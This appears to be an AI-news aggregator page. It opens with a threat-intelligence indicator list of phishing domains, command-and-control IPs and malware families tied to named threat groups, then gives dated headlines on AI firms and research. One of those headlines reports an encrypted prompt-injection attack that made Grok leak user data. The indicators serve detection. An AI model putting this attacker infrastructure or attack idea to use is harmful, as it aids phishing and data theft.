UNC6293 Phishing domain foreignrelations.us UNC6293 Phishing domain 107.189.18.7 C2 for VIDAR fewfwfwfwfwf.info C2 for AtomicStealer first payload 196.251.107.171 C2 for AtomicStealer second payload .online C2 for AtomicStealer second stage .club C2 for AtomicStealer second stage chamber-ua.org UNC7005 Phishing domain; attacker account email domain wa-connect.eu UNC7005 Phishing domain wa-connect.net UNC7005 Phishing domain wa-invite.com UNC7005 Phishing domain wa-device.com UNC7005 Phishing domain wa-meeting.com UNC7005 Phishing domain shopinvite.org UNC7005 Phishing domain my-invite.org UNC7005 Phishing domain; attacker account email domain globsec.net UNC7005 Phishing domain; attacker account email domain statistic-ms.live UNC7005 ENGINELIGHT C2 owa-ms365.com UNC7005 Attacker domain m365-owa.com UNC7005 Attacker domain ms365-device.com UNC7005 Attacker domain ms365-live.com UNC7005 Attacker domain 31.57.243.154 UNC7005 Related IP 38.146.28.75 UNC7005 Related IP 104.194.159.150 UNC7005 Related IP finishoperations.com UNC7005 Phishing domain finishoperations.org UNC7005 Phishing domain foc-share.com UNC7005 Phishing domain share-foc.com UNC7005 Phishing domain internal-share.com UNC7005 Phishing domain foc-share.org UNC7005 Phishing domain drive.google.verify-drive.com UNC5976 Phishing domain mail.kiis.co.uk UNC5976 Malware distribution domain Table 1: Network Indicators File Indicators SHA256 Malware Family Attribution Other Notes n/a UNC7005 Globsec phishing page n/a UNC7005 Finnish Operations Center oAuth phishing landing page VIDAR VIDAR used by UNC7005 ATOMIC ATOMIC used by UNC7005 ENGINELIGHT UNC7005 CHERRYPIE UNC7005 CHERRYPIE UNC7005 CHERRYPIE UNC7005 CHERRYPIE UNC7005 CHERRYPIE UNC7005 CHERRYPIE UNC7005 CHERRYPIE UNC7005 HEADRUSH UNC5976 Table 2: File Indicators Google Security Operations (SecOps) Google Security Operations customers with the Enterprise Plus license have access to these rules under the Applied Threat Intelligence - Curated Prioritization rule pack. The activity discussed in the blog post can be detected under the Applied Threat Intelligence (ATI) alerts. These alerts are IoC matches that have been contextualized by YARA-L rules using curated detection. The contextualization leverages Google threat intelligence from Google SecOps context entities, which allows intelligence-driven alert prioritization.

Read original article

xAI

August 20, 2026

Grok exfiltrates user data when malicious instructions are encrypted

Cryptographic Context Injection is only the latest way to break an LLM safety guardrail.

Read original article

Nvidia

August 20, 2026

Chinese AI firms forced to optimise software as local chips trail Nvidia’s - South China Morning Post

Chinese AI firms forced to optimise software as local chips trail Nvidia’s South China Morning Post

Read original article

Meta

August 20, 2026

Meta AI’s new Mac app wants you to talk to your apps

The company said that the dictation feature works across all apps, just like other tools such as Wispr Flow, Superwhisper, and Monologue.

Read original article

Meta

August 20, 2026

Meta Has Quietly Become One of Microsoft’s Largest AI Customers - Bloomberg.com

Meta Has Quietly Become One of Microsoft’s Largest AI Customers Bloomberg.com

Read original article

Anthropic

August 20, 2026

Anthropic's most capable model, codenamed "Model 2," is for internal use only

Anthropic uses an unpublished AI model internally that is more powerful than any publicly available version of Claude. The article Anthropic's most capable model, codenamed "Model 2," is for internal use only appeared first on The Decoder.

Read original article

Claude

August 20, 2026

Binance now lets AI agents trade, but keeping them in check is largely up to users

Binance's Agent OS works with tools such as ChatGPT, Claude Code, and Cursor.

Read original article

Nvidia

August 20, 2026

China now has its own AI circular financing scheme

Unitree Robotics rose 460 percent in its Shanghai IPO, hitting a valuation of around $50 billion. But an FT report shows much of the demand for its robots comes from state-backed training centers that buy the machines and sell the resulting data back to the manufacturers, a circular business model that echoes the Nvidia criticism in the US. The article China now has its own AI circular financing scheme appeared first on The Decoder.

Read original article

Anthropic

August 20, 2026

Auditing Preference Biases and Fine-Tuning Language Models with Direct Preference Optimization on Anthropic HH-RLHF Using TRL and Lo RA

This tutorial provides an end-to-end workflow for fine-tuning language models using Direct Preference Optimization (DPO). We demonstrate how to audit the Anthropic HH-RLHF dataset for structural and length-based biases, implement a robust training pipeline using TRL and LoRA, and evaluate model performance to ensure genuine preference learning rather than reliance on lexical shortcuts. The post Auditing Preference Biases and Fine-Tuning Language Models with Direct Preference Optimization on Anthropic HH-RLHF Using TRL and LoRA appeared first on MarkTechPost.

Read original article

OpenAI

August 20, 2026

Open AI builds safety system that catches misuse without storing customer data

OpenAI plans to offer its most advanced AI models to corporate customers without storing their data, while still detecting misuse. The article OpenAI builds safety system that catches misuse without storing customer data appeared first on The Decoder.

Read original article

OpenAI

August 20, 2026

Introducing AI Futures

Introducing AI Futures, a new OpenAI blog exploring how transformative AI could reshape power, governance, the economy, and individual freedom.

Read original article

Google

August 20, 2026

AI in Search Reduces Publisher Referrals Without Improving User Experience: Experimental Evidence

arXiv:2608.18352v1 Announce Type: new Abstract: The integration of generative AI into web search delivers synthesized answers to user queries, changing how people navigate and assess information, while raising concerns about the downstream impacts on publishers who supply the underlying content. We conduct a preregistered field experiment (N=1,100) on Google Search, the dominant online search platform, to estimate the causal effects of AI Overviews and AI Mode on user behavior, perceptions, and publisher traffic. We show that removing AI Overviews and AI Mode increases click-through rates to publishers, while an AI Mode-only experience reduces click-through rates and erodes user experience and trust in information found on Google. These findings show that integrating generative AI into web search reshapes online attention, with economic consequences for the online publishers that sustain both search platforms and the overall information ecosystem.

Read original article

Hugging Face

August 20, 2026

Position: Current Model Cards Are Insufficient for Downstream Governance of Open-Weight Foundation Models

arXiv:2608.18086v1 Announce Type: new Abstract: The growth of open-weight foundation models (OWFMs) has prompted the AI community to re-evaluate strategies for effective downstream governance. Although model cards have been widely adopted as transparency artifacts in model repositories, existing frameworks often fail to adequately inform downstream developers and users about the distinct safety challenges posed by OWFMs. This position paper analyzes 500 model cards hosted on Hugging Face and argues that effective governance of OWFMs requires a multi-layered approach integrating three complementary components: (i) model cards, (ii) acceptable use policies (AUPs), and (iii) licenses. To motivate this claim, we identify a safety gap left by existing regulatory approaches, including model heritage, alignment provenance, and empirically observed behaviors, through an analysis of model cards with safety-critical information. We further argue that standard open-source licenses (OSLs) are not well suited for OWFMs and may weaken the enforceability of AUPs. Building on these observations, we outline directions for evolving model cards, AUPs, and licenses into integrated safety artifacts to enable a more comprehensive governance framework that coherently integrates informational, normative, and legal dimensions.

Read original article

Claude

August 20, 2026

Solving Is Not Drawing: A Benchmark for Diagrammatic Reasoning in Olympiad Geometry

arXiv:2608.18111v1 Announce Type: new Abstract: Foundation models such as GPT and Claude now solve olympiad-level mathematics with remarkable proficiency, so much so that geometry problem solving has become a standard proxy for their mathematical reasoning. Yet solving a geometry problem and drawing the figure it depends on are not the same skill: progress often hinges on a faithful diagram with the right auxiliary constructions and incidences, and it is unclear that a model which reasons its way to the answer can also produce one. A growing collection of benchmarks, including MathVista, and MathVerse, measures whether models reach the correct answer, but to our knowledge, none isolate the distinct ability to construct the diagram itself, leaving this capability unmeasured. We introduce an open-source benchmark that targets this gap: 954 self-contained olympiad geometry problems, with a 297-problem hard subset, each paired with its solution and a human-authored, high-fidelity diagram in renderable Asymptote code, together with a suite of text-, code-, image-, VLM-, and constraint-based metrics for what we term diagrammatic reasoning. Evaluating current foundation models reveals a pronounced gap between solving and drawing: their diagrams are markedly less faithful, with an average compile success rate of only 36.14\%. Strong mathematical reasoning, we find, does not imply the ability to construct accurate geometric diagrams. Our benchmark and dataset can be accessed at https://huggingface.co/datasets/max98765/hard_geometry_problems_with_diagrams.

Read original article

Claude

August 20, 2026

Closure Bench: A Constructive Benchmark for Compositional Graph Reasoning

arXiv:2608.18242v1 Announce Type: new Abstract: We introduce ClosureBench, a constructive benchmark for compositional graph-relational reasoning with programmatically verified ground truth. Unlike fixed-test-set benchmarks vulnerable to data contamination, ClosureBench generates instances on demand: each task's reference answer is computed by executing a program in the Ein tensor-logic language, ensuring machine-verified correctness. The benchmark spans 26 task categories at three compositional levels (L1-L3), with difficulty controlled along three independent axes: graph size, edge density, and query depth. We evaluate models from 1.5B open weights to frontier systems (o3, GPT-4.1, Gemini 2.5, Claude Sonnet 4) and report three findings. First, because the benchmark can always supply fresh instances, it measures memorisation directly: a model fine-tuned on a fixed test set shows a 19.3 percentage-point gap between its accuracy on seen and on fresh instances, which a static test set cannot reveal. We scope this to supervised fine-tuning on answer pairs, not pretraining contamination. Second, accuracy falls as graph size and query depth increase, and the two interact: models misread the graph from its natural-language description and then reason correctly over the wrong graph, so even the strongest frontier model degrades from atomic to compositional queries. This bottleneck is a property of the reasoning rather than the input format: it persists when the graph is given as a JSON edge list or an adjacency matrix instead of prose. Third, a 4B model fine-tuned to emit executable programs rather than answers stays nearly flat across compositional levels and approaches frontier accuracy (94.3% on held-out instances) at a fraction of the token cost. This holds for two program targets, Ein and Python+NetworkX, so it is a property of verified program synthesis rather than of one language.

Read original article

Nvidia

August 20, 2026

Sanja Fidler’s world model startup Veeda AI raises $90 M in seed funding

Veeda AI, a startup led by a team of former Nvidia Corp. researcher and renowned computer scientist Sanja Fidler, has taken its bow on the main stage after raising $90 million in a seed funding round today. The round, which was first reported by The Logic, was co-led by Khosla Ventures and Radical Ventures, is […] The post Sanja Fidler’s world model startup Veeda AI raises $90M in seed funding appeared first on SiliconANGLE.

Read original article

OpenAI

August 20, 2026

How Chat GPT Work helps Stampli move ideas to market

With a fixed deadline and design resources committed elsewhere, Stampli used Codex and ChatGPT Work to compress weeks of launch production into days.

Read original article

Nvidia

August 19, 2026

Developing NVIDIA Holoscan Applications with CLI, Skills, and AI Coding Agents

NVIDIA Holoscan is a platform for building real-time AI applications at the edge, from medical imaging to robotics. HoloHub is its companion repository: a...

Read original article

Anthropic

August 19, 2026

Open AI seeks to one-up Anthropic with new customer privacy protections

A competition is developing between OpenAI and Anthropic over who can provide the best privacy protections for enterprise customer data.

Read original article

OpenAI

August 19, 2026

“The opening stages of Open AI’s unraveling”: Open AI slows model training — not everyone is buying the explanation

Something of a trend has emerged this year, with the major AI labs going all-out to tell the world how The post “The opening stages of OpenAI’s unraveling”: OpenAI slows model training — not everyone is buying the explanation appeared first on The New Stack.

Read original article

Anthropic

August 19, 2026

Cognition CEO denies report that Space X tried to acquire the startup

SpaceX was reportedly in talks to buy AI coding startup Cognition. SpaceX has already acquired Cursor as it races to catch up to rivals like OpenAI and Anthropic in enterprise AI.

Read original article